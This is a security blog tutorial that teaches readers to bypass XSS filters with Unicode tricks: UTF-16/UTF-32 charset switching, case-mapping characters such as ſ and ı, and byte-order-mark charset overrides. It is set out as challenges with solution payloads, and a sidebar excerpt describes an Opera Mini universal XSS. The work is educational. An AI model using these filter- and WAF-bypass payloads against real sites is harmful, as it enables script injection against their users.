Skip to main content

Xssing Web Part - 2

Xssing Web With Unicodes

Hello friends, 

This is the second part of "Xssing Web". In this post I would show how to abuse unicodes to bypass XSS filters. 

BTW if you want to check previous part click here.

Note : If you think there are any mistakes in this post then kindly mention it in comments.

I have developed several XSS challenges to show how unicodes can be used to bypass filters. If you want to try those challenges first then click here, get back here if you couldn't solve any.

Abusing Unicode :

So what is Unicode?

-> Unicode is nothing but the encoding standard. It defines UTF-8UTF-16,UTF-32, etc encodings.

1) UTF-8 :

Characters Size : 1 byte to 4 byte

Example :

Character "A" => 0x41
Character "¡"  => 0xC2 0xA1
Character "ಓ" => 0xE0 0xB2 0x93
Character "𪨶" => 0xF0 0xAA 0xA8 0xB6

2) UTF-16 :

Character Size : 2 byte

However in UTF-16 there are two ways to represent any characters.

i) UTF-16be (be- Big Endian) [Left to Right Byte Order ]

Example :

Character "A" => 0x00 0x41

ii) UTF-16le (le- Little Endian) [Right to Left Byte Order]

Example :

Character "A" => 0x41 0x00

3) UTF-32 :

Character Size : 4 byte

In UTF-32 also there are two ways to represent any character.

i) UTF-32be (be- Big Endian) [Left to Right Byte Order]

Example :

Character "A" => 0x00 0x00 0x00 0x41

ii) UTF-32le (le- Little Endian) [Right to Left Byte Order]

Example :

Character "A" => 0x41 0x00 0x00 0x00

Alright. Enough unicode theory.

Let's see some XSS filters that you can bypass using unicode.

Challenge 1 :

How would you bypass it?


Hint : You can control the charset of html response.

No luck?
It's simple, you just have to use UTF-16 encoding to bypass the filter. 

Solution :

Here we changed charset to "utf-16be" hence browser will treat page as UTF-16 big endian encoded page. In UTF-16 each character size is 2 bytes hence <svg/onload=alert()> becomes \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>

Alright now let's consider "UTF-16" string is filtered.

Challenge 2 :

Now how would you bypass it?

Hint : You can control the charset of html response.

No luck?
It's also very simple, you can simply use UTF-32 encoding to bypass the filter.

Solution :

Note : When you don't specify BE (Big Endian) or LE (Little Endian) then browsers by default consider encoding as "Big Endian" in UTF-32 and "Little Endian" in UTF-16 encoding.

BTW did you noticed I added two extra null bytes at the beginning of our payload?


Let me explain why, since each character in UTF-32 is of 4 bytes size while reading the page browser will consider each 4 bytes as one character, so if there are say just 2 characters (2 bytes) before our payload then we must add two extra characters (bytes) to complete a character of 4 bytes so that browser won't consume bytes from our payload while reading previous character.

Abusing Unicode Case Mappings :

Now let's move towards unicode case mappings.

Lets see if there are any unicode characters which when mapped to upper or lower case transform to english alphabet letters.

I wrote a small JS code to obtain these characters. [You can get the code here]

We can use this unicode characters to bypass some of XSS filters.

Challenge 3 :

Could you solve it?
Hint : Check above image

Let's try to solve it , as you can see in above image we have a unicode character  ſ [\u017fwhich when mapped to Upper Case turns into capital letter "S". 

Our payload : 

Solution :<%C5%BFcript/src=./1></script>

Now let's make it little harder.

Challenge 4 :

Could you XSS now?

No? Ah. It's also very simple.

Let's check above image again. You see there's a unicode character ı [\u0131] which when mapped to Upper Case turns into capital letter "I".

Our payload : <scrıpt/src=./1></script>


Now let's try another challenge.

Challenge 5 :

Try to solve it.

No luck? Get back to above image again. See unicode character [\u212a] when mapped to Lower Case transforms to letter "k".

Our payload : x oncliK=aler$t()

Solution onclic%e2%84%aa=aler$t()

Note : Since I couldn't disable WAF , to bypass WAF I had to put '$' in "aler$t()".

Tool to convert unicode code points to UTF-8 bytes :

Abusing BOM - Byte Order Mark :

What is BOM ?

For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

- Wikipedia

Note : The page must begin with the BOM character.

- BOM Character :

For UTF-16 Encoding:

Big Endian : 0xFE 0xFF 

Little Endian : 0xFF 0xFE

For UTF-32 Encoding:

Big Endian : 0x00 0x00 0xFE 0xFF 

Little Endian : 0xFF 0xFE 0x00 0x00

Alright. Here's a small challenge. This challenge was actually posted by @rawsec

Challenge 6 :

This is going to be hard one. 
Couldn't solve it?

Hint : BOM

Still no luck?

Let me tell you one interesting thing about BOM character, it allows you to override charset of the page. The only requirement is that page should begin with this character.

So to override page encoding with UTF-16be you can use BOM character 0xFE 0xFF ,  for UTF-32be you can use 0x00 0x00 0xFE 0xFF.

UTF-16BE Solution

UTF-32BE Solution

That's enough for today :)

References :


  1. But how common is it to be able to change the charset with a query param?

  2. \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>

    from where u got this? I could not find anywhere equivalent to this


Post a Comment

Popular posts from this blog

U-XSS in OperaMini for iOS Browser (0-Day) [CVE-2019-13607]

TL;DR :  The latest version (16.0.14) of  Operamini for iOS browser is affected by an Universal-XSS vulnerability which can be triggered by performing navigation from target domain to attacker controlled domain. When attacker controlled domain returns " javascript:code_here " in " location " header then browser executes the javascript code in the context of target domain instead of attacker domain. This vulnerability is yet not fixed by Opera team.  Update [15 July 2019] :  CVE-2019-13607 is assigned to this vulnerability. So while playing with Operamini browser I noticed that when a navigation to " javascript " protocol occurs via " location " header then browser executes the provided javascript code. For example if the value of " location " header is " javascript:alert() " then javascript code "alert()" gets executed by the browser. Normally browsers prevent navigation to " javascript: " URL

JSP ContextPath Link Manipulation - XSS

This post is about how to manipulate resource links of HTML elements (script, img, link, etc) when getContextPath  method is used to obtain base path of resources. With the ability to manipulate links you can do XSS, CSS Injection, etc. Basically we are going to use path parameters to manipulate context path such that links would point to attacker's domain. There's a good blog that talk about the similar issues : However this post is more about manipulating context path to hijack resource links of HTML elements .  So let's have a look at a simple JSP page ( test.jsp ) Ref : This page just loads some resources like script, image, css and that's it. It doesn't take any direct input from user but it is using value returned by r equest.getContextPath() as base path to resources link. What can we do here? Let's try to contro